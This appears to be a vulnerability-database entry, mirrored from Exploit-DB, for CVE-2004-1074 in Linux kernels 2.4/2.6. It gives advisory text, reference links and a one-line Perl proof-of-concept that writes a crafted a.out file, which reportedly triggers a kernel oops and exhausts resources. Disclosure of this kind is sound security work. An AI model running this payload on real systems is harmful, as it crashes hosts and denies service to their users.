Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108306 漏洞类型 Design Error
发布时间 2004-11-25 更新时间 2007-01-18
CVE编号 CVE-2004-1074 CNNVD-ID N/A
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/24777
https://www.securityfocus.com/bid/11754
|漏洞详情
This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
|漏洞EXP
source: http://www.securityfocus.com/bid/11754/info

The Linux kernel is reported prone to multiple local vulnerabilities:

- A handcrafted 'a.out' file may be used to trigger a local denial-of-service condition. A local attacker may exploit this vulnerability to trigger a system-wide denial of service, potentially resulting in a kernel panic. 

- A memory-disclosure vulnerability reportedly affects only SMP computers with more than 4GB of memory. A local attacker may exploit this vulnerability to access random pages of physical memory.

perl -e'print"\x07\x01".("\x00"x13)."\xc0".("\x00"x16)' > eout 

Executing the resulting 'eout' file reportedly results in a kernel oops. Repeatedly running the resulting file will consume file descriptors and memory.
|受影响的产品
Turbolinux Turbolinux Server 10.0 SuSE SUSE Linux Enterprise Server 8 + Linux kernel 2.4.21 + Linux kernel 2.4.19 SuSE Linu
|参考资料
resource:
hyperlink:http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000930
resource:
hyperlink:http://marc.info/?l=bugtraq&m=110322596918807&w=2
resource:
hyperlink:http://marc.info/?l=linux-kernel&m=110021173607372&w=2
resource:
hyperlink:http://www.debian.org/security/2006/dsa-1067
resource:
hyperlink:http://www.debian.org/security/2006/dsa-1069
resource:
hyperlink:http://www.debian.org/security/2006/dsa-1070
resource:
hyperlink:http://www.debian.org/security/2006/dsa-1082
resource:
hyperlink:http://www.mandriva.com/security/advisories?name=MDKSA-2005:022
resource:Exploit
hyperlink:http://www.securityfocus.com/bid/11754
resource:
hyperlink:http://www.trustix.org/errata/2005/0001/
resource:
hyperlink:https://bugzilla.fedora.us/show_bug.cgi?id=2336
resource:
hyperlink:https://exchange.xforce.ibmcloud.com/vulnerabilities/18290
resource:
hyperlink:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9751